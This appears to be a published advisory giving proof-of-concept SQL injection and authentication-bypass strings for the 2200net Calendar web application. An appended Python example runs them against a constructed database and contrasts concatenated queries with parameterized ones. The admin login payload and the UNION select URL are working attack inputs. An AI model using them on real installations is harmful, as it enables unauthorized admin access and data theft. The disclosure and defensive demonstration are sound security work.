PoC/Exploit for SQL-inj and Auth Bypass in 2200net Calendar system

Published proof-of-concept code for SQL injection and auth bypass in the 2200net Calendar system.

Description: Available
Solution: Not available - check vendor's website

Authorization Bypass.

url: http://host/cal/admin.php?ad=login

login account: ' or 1/*

login password: any

SQL Injection Example.

http://host/cal/main.php?&po=calendar&op=calendar_only&fm_data[id]=999'%20union%20select%201,2,3,4,5,6,7,8,9/*
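Both inputs above work only if request values are concatenated into the SQL text. The following is an added example, not code from the advisory or from the 2200net project: it runs the page's two strings against a concatenated query and a parameterized one. The table names, column names, function names and the use of SQLite in place of the application's database are assumptions.

```python
import re
import sqlite3

def make_db():
    # Constructed schema and data; the page does not show the real tables.
    # SQLite stands in for the application's database and, as the strings
    # above rely on, reads an unterminated /* as a comment to end of input.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admins (login TEXT, password TEXT)")
    db.execute("INSERT INTO admins VALUES ('admin', 'constructed-secret')")
    db.execute("CREATE TABLE events (id INTEGER, c2, c3, c4, c5, c6, c7, c8, c9)")
    db.execute("INSERT INTO events VALUES (1, 'mtg', 0, 0, 0, 0, 0, 0, 0)")
    return db

def login_concat(db, login, password):
    # Assumed vulnerable pattern: input pasted straight into the SQL text.
    sql = ("SELECT login FROM admins WHERE login = '" + login +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone() is not None

def login_param(db, login, password):
    # Placeholders keep both values as data, so quotes and /* are inert.
    # (A real system would compare a salted password hash, not plain text.)
    sql = "SELECT login FROM admins WHERE login = ? AND password = ?"
    return db.execute(sql, (login, password)).fetchone() is not None

def event_concat(db, event_id):
    # Assumed vulnerable pattern for the fm_data[id] lookup.
    sql = "SELECT * FROM events WHERE id = '" + event_id + "'"
    return db.execute(sql).fetchall()

def event_param(db, event_id):
    # Assumption: ids are numeric, so reject anything else, then bind.
    if not re.fullmatch(r"[0-9]{1,9}", event_id):
        return []
    return db.execute("SELECT * FROM events WHERE id = ?",
                      (int(event_id),)).fetchall()

if __name__ == "__main__":
    db = make_db()
    bypass, union = "' or 1/*", "999' union select 1,2,3,4,5,6,7,8,9/*"
    print("concat login:", login_concat(db, bypass, "any"))
    print("param login: ", login_param(db, bypass, "any"))
    print("concat event:", event_concat(db, union))
    print("param event: ", event_param(db, union))
```

In the concatenated login query the comment marker discards the password condition, and in the concatenated lookup the nine-value union matches the column count of the original select; the parameterized forms return no match for either string.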
